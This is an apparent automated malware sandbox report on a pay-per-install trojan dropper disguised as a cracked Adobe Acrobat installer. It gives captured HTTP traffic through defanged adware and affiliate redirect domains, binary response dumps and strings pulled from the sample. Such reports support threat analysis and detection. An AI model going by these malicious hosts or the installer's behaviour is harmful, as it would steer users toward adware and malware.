0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Sun, 27 Nov 2016 15:38:42 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0..0..
GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: win.ketydesmidiana.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 27 Nov 2016 15:38:13 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02734-1024c893cfbfff9cc18408df1cefd7-1006-4-0-0-0-0-UA-0-3131-32373335-3130393538313332-_-_-31333532323234373631-194.242.96.226-20161127103813-_-05006D112A1D243C70397465550C64525E4D096750152358604977030A45533D7834601B4D480F741D; expires=Tue, 27 Dec 2016 15:38:13 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Wed, 23 Oct 2019 02:18:13 GMT; path=/;
tracking_id: 1024c893cfbfff9cc18408df1cefd7
X-Robots-Tag: noindex, nofollow
Content-Length: 453
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a>.</p>.</body></html>...
<<< skipped >>>
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:16:52 GMT
Expires: Mon, 28 Nov 2016 19:16:52 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 246112
Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."....HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:16:52 GMT..Expires: Mon, 28 Nov 2016 19:16:52 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 246112..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."........
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 20:12:58 GMT
Expires: Mon, 28 Nov 2016 20:12:58 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 242748
Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 20:12:58 GMT..Expires: Mon, 28 Nov 2016 20:12:58 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 242748..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v....
GET /r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Sun, 27 Nov 2016 15:38:47 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Server: Golfe2
Content-Length: 35
GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-Allow-Origin: *..Date: Sun, 27 Nov 2016 15:38:47 GMT..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-store, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-Content-Type-Options: nosniff..Content-Type: image/gif..Server: Golfe2..Content-Length: 35..GIF89a.............,...........D..;..
GET /appImg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 4628
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT
ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 74433
X-Cache: Hit from cloudfront
Via: 1.1 616f617776e843142ab5d87231cb3526.cloudfront.net (CloudFront)
X-Amz-Cf-Id: eXOPAKCBYjP73UFpmlKl_Stk7IsY9FpCsFHwDlzEkoSBu4TrH411fQ==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xmpMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................K.G........................................................................................!..1AQa.."R.T.q24D.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....rS.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_3584:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
p&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe
venzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B
etc.dll
version="0.5.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
true
8 8$8(8,808